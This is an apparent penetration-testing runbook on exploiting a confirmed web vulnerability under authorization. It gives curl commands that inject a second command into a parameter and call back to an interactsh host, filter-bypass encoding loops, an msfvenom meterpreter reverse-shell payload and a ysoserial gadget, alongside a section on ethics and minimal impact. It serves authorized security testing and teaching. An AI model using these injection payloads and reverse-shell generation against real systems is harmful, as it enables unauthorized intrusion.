Exploitation & Payload Crafting
Authorized runbook for validating a confirmed vulnerability: payload selection, filter bypass, out-of-band confirmation, chaining, and proving impact without over-reaching.
Exploitation is where a maybe becomes a proof. Rule one: demonstrate the minimum impact required to prove the finding, then stop. This runbook assumes the vulnerability is already confirmed and in scope, against authorized targets only.
1. Re-confirm and baseline
Reproduce the trigger and capture clean evidence before sending anything.
# Baseline status, length, and timing for comparison
curl -s -o /dev/null -w 'status=%{http_code} len=%{size_download} time=%{time_total}\n' \
'https://target/search?q=baseline'
# Repeat to confirm stability
for i in 1 2 3; do curl -s -o /dev/null -w '%{http_code} %{size_download}\n' 'https://target/search?q=baseline'; done
Ask: latest version? authorized window? least intrusive proof? baseline captured?
2. Out-of-band confirmation
A callback you control proves execution with the least footprint. Generate a unique canary per test.
# Start a listener / use your interactsh client to get a domain: <id>.oast.pro
interactsh-client -o oob.log
# Land a harmless callback first
curl -s "https://target/fetch?url=http://<id>.oast.pro/ping"
If the callback arrives, you have proof of server-side execution. Escalate only as far as needed.
3. Payload selection by context
Match payload to context, not the reverse.
| Context | Approach |
|---|---|
| Reflected input | harmless marker first, then scale up |
| File write | proof file, not a full webshell |
| Command sink | id / whoami first |
| Deserialization | sleep/DNS callback before RCE chain |
| Database | version() / current user first |
# Command-sink proof with a callback
curl -s "https://target/ping?host=127.0.0.1;curl http://<id>.oast.pro/rce"
4. Filter bypass
Most “blocked” payloads are blocked by a narrow filter.
# Try encoding variants against the same sink
for p in "id" "%69%64" "%2569%2564" "i\\d"; do
echo "== $p =="
curl -s "https://target/ping?host=127.0.0.1;$p"
done
- Encoding: URL, double-URL, HTML entities, Unicode, hex.
- Case and whitespace: mixed case, tabs, comment tokens.
- Concatenation: split keywords across parameters.
- Alternative sinks: if parameter A is filtered, test B reaching the same code.
Always determine whether the filter is client-side (defeated by proxy) or server-side.
5. Payload generation
# Web-deliverable payload if a shell is genuinely required
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<lhost> LPORT=4444 -f elf -o proof.elf
# Java deserialization gadget (only on an authorized sink)
ysoserial URLDNS 'http://<id>.oast.pro' > gadget.ser
Prefer a callback over a session. Never leave a live shell running longer than needed.
6. Full pipeline
# 1. Baseline
curl -s -o /dev/null -w 'status=%{http_code} len=%{size_download} time=%{time_total}\n' 'https://target/search?q=baseline'
# 2. OOB listener (separate terminal), then canary
interactsh-client -o oob.log
curl -s "https://target/fetch?url=http://<id>.oast.pro/ping"
# 3. Confirm execution via command sink
curl -s "https://target/ping?host=127.0.0.1;curl http://<id>.oast.pro/rce"
# 4. Map filter behavior
for p in "id" "%69%64" "%2569%2564"; do echo "== $p =="; curl -s "https://target/ping?host=127.0.0.1;$p"; done
# 5. Generate a payload only if needed; deliver, prove, stop
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<lhost> LPORT=4444 -f elf -o proof.elf
Ethics & legality
- Exploit only confirmed, in-scope vulnerabilities with written authorization.
- No persistence, no lateral movement, no exfiltration beyond minimal proof.
- Stop at first confirmation of impact; timestamps every action.
- Do not run destructive payloads or touch out-of-scope systems.